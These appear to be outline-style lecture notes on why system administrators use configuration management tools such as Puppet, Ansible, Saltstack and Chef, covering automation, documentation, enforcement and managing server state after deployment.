-What is configuration management? (e.g. Puppet, Ansible, Saltstack, Chef)
-Why configuration management?
Example:
-configure a web server
-install packages
-edit config files
-restart services
-fiddle around + troubleshoot
-document 90%
-one server takes X time, two servers take 2X time -- linear
-configure a web server 2:
-keep track of shell history
-paste commands into a script
-do some basic conditional logic -- if this worked, then do this
-paste config files in
-configure a web server 3:
-make image of perfect web server
-clone + run scripts to configure stuff at deployment
-hope that things stay cool
-more scripts to manage stuff when it goes wrong
-when stuff changes, create a new base image, slowly push out to servers in batches
-pray, swear, troubleshoot, fix, repeat
-configure a web server 4:
-config management! Configure STATE, instead of PROCESS
-1 or 100 servers...all the same
-MANAGE STATE ONCE YOU HAVE DEPLOYED
-which servers are still running the old version of package xyz?
-on which servers has this config file been changed?
-did the hacker add evil stuff in the web server config? In the crontab?
-you are not flying blind after deployment anymore
1. Automation
-repeat tasks
2. Documentation
-forced to be fairly simple
-how does something work? Let's check!
-easy-to-explore abstraction of a process
3. Enforcement
-see what's changed, enforce compliance
-no more 'stragglers' -- huge problem in large deployments
What problems does this solve?
-system imaging is fine for a while, but then MANAGING those systems is tough
-automation
-variance in large deployments -- some old, some new, some vulnerable, some configured differently (auditing)
-no way to quickly see what state everyone is in
-idempotence -- most aim to be safer than scripts
-'infrastructure as code' -- makes versioning, testing, and deployment easier
For the 'small' Sysadmin?
-documentation shuffle, docs get stale
-you forget how you did stuff, since you're not deploying 10-15 servers/containers a day
-one abstraction level above shell scripts -- STATE, not PROCESS
-automate stuff (the 'large deployment' features are less important here)
-document stuff (no more awkward notes -- the Lisp ideal of "the code IS the documentation" is achieved)
![[10.09.2024 16:40] HTML / CSS Lesson 17_1](https://i.ytimg.com/vi/0poMK-WUQ2Q/mqdefault.jpg)
